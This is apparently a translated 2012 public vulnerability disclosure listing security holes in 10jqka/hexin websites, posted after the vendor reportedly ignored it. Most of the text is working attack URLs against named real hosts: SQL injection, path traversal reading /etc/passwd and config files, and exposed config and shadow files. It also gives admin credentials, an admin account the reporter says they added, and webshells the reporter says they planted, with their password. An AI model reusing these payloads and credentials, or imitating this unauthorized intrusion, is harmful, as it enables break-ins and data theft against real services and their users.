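2012-03-26: Details reported to the vendor; awaiting vendor handling
2012-03-31: The vendor actively ignored the vulnerability; details disclosed to the public

I spent a long time testing your site some time ago, and I am now reporting the places where your site's security falls short.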
http://www.10jqka.com.cn/modules.php?name=Downloads&d_op=viewdownload&cid=44%20and%201=1 injection

http://dl.hexin.cn/admin/index.html HackerEnd 123456 (an account I added)

The JavaScript validation on this admin backend of your site is not done well, and there is also injection in the PHP backend:

http://dl.hexin.cn/admin/mes_admin.php?do=soft_up&id=408%20and%20user%3E0

http://dl.hexin.cn/dlnew/accept_ver_new.php_bak

http://dl.hexin.cn/

http://wapdx.hexin.cn/config/config.ini

http://dl.hexin.cn/admin/index.html

Sensitive information disclosure

http://ns2.10jqka.com.cn/upload/oday.php one-liner webshell woainichang; this upload is not validated properly

http://t.hexin.cn/download/pas$log.txt

http://t.hexin.cn/phpinfo.php one-liner webshell woainichang

- - This one is an arbitrary file download vulnerability:

http://wapyd.hexin.cn/dlarea_t/download_web.php?fn=../../../../../../etc/passwd&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv=

http://wapyd.hexin.cn/dlarea_t/download_web.php?fn=../global.php&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv=

http://t.hexin.cn/dlxhtml/download.php?fn=../download/xx.php&bid=1&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&mid=1919&mname=WM6.0%E5%8F%8A%E4%BB%A5%E4%B8%8A

http://wapdx.hexin.cn/manager/admin H10EjXqIkNahexin 10HjEqXkIaN [email protected]

http://mobile.10jqka.com.cn/main/admin/adv_img.php the backend, all sorts of things

http://210.51.244.176/etc/shadow
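This one leaves me speechless.

http://mobile.10jqka.com.cn/main/dlquery_s.php?bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946&mname=Gpad&tyid=2705

Formerly root, MySQL version 4.x, no gpc ~

Take a look yourselves and you will see.

Many of the PHP programs reflect the security practices of 2008-2010 and have many flaws; please have security staff maintain your site. If there are any problems, contact me by email: [email protected]

Severity: no impact, ignored by vendor
Ignored at: 2012-03-31 14:21
2012-04-17: Changed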